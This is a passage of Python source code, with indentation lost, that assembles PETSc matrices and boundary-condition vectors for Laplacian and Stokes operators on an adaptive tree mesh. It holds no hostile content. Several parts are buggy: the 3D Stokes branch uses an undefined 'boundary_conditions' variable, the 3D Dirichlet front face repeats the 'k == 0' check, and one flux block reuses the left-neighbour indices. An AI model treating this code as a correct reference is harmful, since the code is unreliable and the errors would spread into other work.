matrix_add(tree, matrix, row, -dy*dz/(dx), level, i, j, k)
matrix_add(tree, matrix, row, dy*dz/(dx), level, i_right, j_right, k_right)
else:
for o in range(2):
for n in range(2):
matrix_add(tree, matrix, row, -(dy/2.)*(dz/2.)/((dx/2.)), level+1, 2*i+1, 2*j+n, 2*k+o)
matrix_add(tree, matrix, row, (dy/2)*(dz/2.)/((dx/2.)), level+1, 2*i_right, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy*dz)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i, j-1, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dx*dz)/(dy), level, i, j, k)
matrix_add(tree, matrix, row, (dx*dz)/(dy), level, i_left, j_left, k_left)
else:
for o in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j, 2*k+o)
matrix_add(tree, matrix, row, (dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j_left+1, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dz)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i, j+1, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dx*dz/(dy), level, i, j, k)
matrix_add(tree, matrix, row, dx*dz/(dy), level, i_right, j_right, k_right)
else:
for o in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j, 2*k+o)
matrix_add(tree, matrix, row, (dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j_right, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dz)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i, j, k-1)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dx*dy)/(dz), level, i, j, k)
matrix_add(tree, matrix, row, (dx*dy)/(dz), level, i_left, j_left, k_left)
else:
for n in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k)
matrix_add(tree, matrix, row, (dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k_left+1)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dy)/(dz), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i, j, k+1)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -(dx*dy)/(dz), level, i, j, k)
matrix_add(tree, matrix, row, (dx*dy)/(dz), level, i_right, j_right, k_right)
else:
for n in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k+1)
matrix_add(tree, matrix, row, (dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k_right)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dy)/(dz), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
def create_bc_scalar(tree, axis, north=None, south=None, east=None, west=None, front=None, back=None):
scalar = petsc.Vec().create()
number_of_rows = tree.number_of_leaves
scalar.setSizes(number_of_rows, number_of_rows)
scalar.setUp()
boundary_conditions = tree.bc[0]
if north is None and south is None and east is None and west is None and front is None and back is None:
north=tree.bc[1][0]
south=tree.bc[1][1]
west=tree.bc[1][2]
east=tree.bc[1][3]
front=tree.bc[1][4]
back=tree.bc[1][5]
if boundary_conditions == "periodic":
return scalar
elif boundary_conditions == "dirichlet":
if tree.dimension == 2:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, 2*west*dy/(dx*(dx*dy)), True)
if j == 0:
scalar.setValue(row, 2*south*dx/(dy*(dx*dy)), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, 2*east*dy/(dx*(dx*dy)), True)
if j == 2**level-1:
scalar.setValue(row, 2*north*dx/(dy*(dx*dy)), True)
return scalar
elif tree.dimension == 3:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, 2*west*dy*dz/(dx*(dx*dy*dz)), True)
if j == 0:
scalar.setValue(row, 2*south*dx*dz/(dy*(dx*dy*dz)), True)
if k == 0:
scalar.setValue(row, 2*back*dx*dy/(dz*(dx*dy*dz)), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, 2*east*dy*dz/(dx*(dx*dy*dz)), True)
if j == 2**level-1:
scalar.setValue(row, 2*north*dx*dz/(dy*(dx*dy*dz)), True)
if k == 0:
scalar.setValue(row, 2*front*dx*dy/(dz*(dx*dy*dz)), True)
return scalar
elif boundary_conditions == "neumann":
if tree.dimension == 2:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, west*dy/(dx*dy), True)
if j == 0:
scalar.setValue(row, south*dx/(dx*dy), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, east*dy/(dx*dy), True)
if j == 2**level-1:
scalar.setValue(row, north*dx/(dx*dy), True)
return scalar
elif tree.dimension == 3:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, west*dy*dz/(dx*dy*dz), True)
if j == 0:
scalar.setValue(row, south*dx*dz/(dx*dy*dz), True)
if k == 0:
scalar.setValue(row, back*dx*dy/(dx*dy*dz), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, east*dy*dz/(dx*dy*dz), True)
if j == 2**level-1:
scalar.setValue(row, north*dx*dz/(dx*dy*dz), True)
if k == 2**level-1:
scalar.setValue(row, front*dx*dy/(dx*dy*dz), True)
return scalar
def create_stokes_part_matrix(tree_x=None, tree_y=None, tree_z=None):
matrix = petsc.Mat().create()
if cfg.dimension == 2:
number_of_rows = tree_x.number_of_leaves
boundary_conditions_x = cfg.bc_dict[tree_x.tag][0]
boundary_conditions_y = cfg.bc_dict[tree_y.tag][0]
size_row = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
size_col = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
matrix.setSizes((size_row, size_col))
matrix.setUp()
# matrix = np.zeros(shape=(number_of_rows, number_of_rows), dtype=np.float)
# x-component
for row in range(number_of_rows):
index = tree_x.tree_leaves[row]
i = tree_x.nindex_x[index]
j = tree_x.nindex_y[index]
k = tree_x.nindex_z[index]
level = tree_x.nlevel[index]
dx = tree_x.ndx[index]
dy = tree_x.ndy[index]
dz = tree_x.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dy)/(dx*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dy)/(dx*(dx*dy)), level, i_left, j_left, k_left)
else:
for n in range(2):
matrix_add(tree_x, matrix, row, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i, 2*j+n, 2*k)
matrix_add(tree_x, matrix, row, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_left+1, 2*j+n, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy)/(dx*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dy/(dx*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, dy/(dx*(dx*dy)), level, i_right, j_right, k_right)
else:
for n in range(2):
matrix_add(tree_x, matrix, row, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i+1, 2*j+n, 2*k)
matrix_add(tree_x, matrix, row, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_right, 2*j+n, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy)/(dx*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dx)/(dy*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx)/(dy*(dx*dy)), level, i_left, j_left, k_left)
else:
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j, 2*k)
matrix_add(tree_x, matrix, row, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_left+1, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx)/(dy*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dx/(dy*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, dx/(dy*(dx*dy)), level, i_right, j_right, k_right)
else:
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j+1, 2*k)
matrix_add(tree_x, matrix, row, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_right, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx)/(dy*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# y-component
for row in range(number_of_rows):
index = tree_y.tree_leaves[row]
i = tree_y.nindex_x[index]
j = tree_y.nindex_y[index]
k = tree_y.nindex_z[index]
level = tree_y.nlevel[index]
dx = tree_y.ndx[index]
dy = tree_y.ndy[index]
dz = tree_y.ndz[index]
row_y = row + number_of_rows
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dy)/(dx*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy)/(dx*(dx*dy)), level, i_left, j_left, k_left, number_of_rows)
else:
for n in range(2):
matrix_add(tree_y, matrix, row_y, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i, 2*j+n, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_left+1, 2*j+n, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy)/(dx*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dy/(dx*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dy/(dx*(dx*dy)), level, i_right, j_right, k_right, number_of_rows)
else:
for n in range(2):
matrix_add(tree_y, matrix, row_y, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i+1, 2*j+n, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_right, 2*j+n, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy)/(dx*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx)/(dy*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx)/(dy*(dx*dy)), level, i_left, j_left, k_left, number_of_rows)
else:
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_left+1, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx)/(dy*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dx/(dy*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dx/(dy*(dx*dy)), level, i_right, j_right, k_right, number_of_rows)
else:
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j+1, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_right, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx)/(dy*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
#the left flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
if cfg.dimension == 3:
number_of_rows = tree_x.number_of_leaves
boundary_conditions_x = cfg.bc_dict[tree_x.tag][0]
boundary_conditions_y = cfg.bc_dict[tree_y.tag][0]
boundary_conditions_z = cfg.bc_dict[tree_z.tag][0]
size_row = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
size_col = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
matrix.setSizes((size_row, size_col))
matrix.setUp()
# matrix = np.zeros(shape=(number_of_rows, number_of_rows), dtype=np.float)
# x-component
for row in range(number_of_rows):
index = tree_x.tree_leaves[row]
i = tree_x.nindex_x[index]
j = tree_x.nindex_y[index]
k = tree_x.nindex_z[index]
level = tree_x.nlevel[index]
dx = tree_x.ndx[index]
dy = tree_x.ndy[index]
dz = tree_x.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dy*dz)/(dx*(dx*dy*dz)), level, i_left, j_left, k_left)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_x, matrix, row, -((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i, 2*j+n, 2*k+o)
matrix_add(tree_x, matrix, row, ((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i_left+1, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dy*dz/(dx*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, dy*dz/(dx*(dx*dy*dz)), level, i_right, j_right, k_right)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_x, matrix, row, -(dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i+1, 2*j+n, 2*k+o)
matrix_add(tree_x, matrix, row, (dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i_right, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx*dz)/(dy*(dx*dy*dz)), level, i_left, j_left, k_left)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o)
matrix_add(tree_x, matrix, row, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dx*dz/(dy*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, dx*dz/(dy*(dx*dy*dz)), level, i_right, j_right, k_right)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o)
matrix_add(tree_x, matrix, row, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree_x, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i, j, k-1)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx*dy)/(dz*(dx*dy*dz)), level, i_left, j_left, k_left)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k)
matrix_add(tree_x, matrix, row, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_left+1)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree_x, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i, j, k+1)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx*dy)/(dz*(dx*dy*dz)), level, i_right, j_right, k_right)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k+1)
matrix_add(tree_x, matrix, row, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_right)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# y-component
for row in range(number_of_rows):
index = tree_y.tree_leaves[row]
i = tree_y.nindex_x[index]
j = tree_y.nindex_y[index]
k = tree_y.nindex_z[index]
level = tree_y.nlevel[index]
dx = tree_y.ndx[index]
dy = tree_y.ndy[index]
dz = tree_y.ndz[index]
row_y = row + number_of_rows
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy*dz)/(dx*(dx*dy*dz)), level, i_left, j_left, k_left, number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_y, matrix, row_y, -((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i, 2*j+n, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, ((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i_left+1, 2*j+n, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dy*dz/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dy*dz/(dx*(dx*dy*dz)), level, i_right, j_right, k_right, number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_y, matrix, row_y, -(dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i+1, 2*j+n, 2*k+o, number_of_rows)
